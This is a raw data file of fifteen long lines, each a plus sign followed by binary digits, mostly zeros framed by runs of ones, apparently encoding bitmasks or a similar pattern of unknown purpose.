+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001010110001000010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010110100100011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001101110101100111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 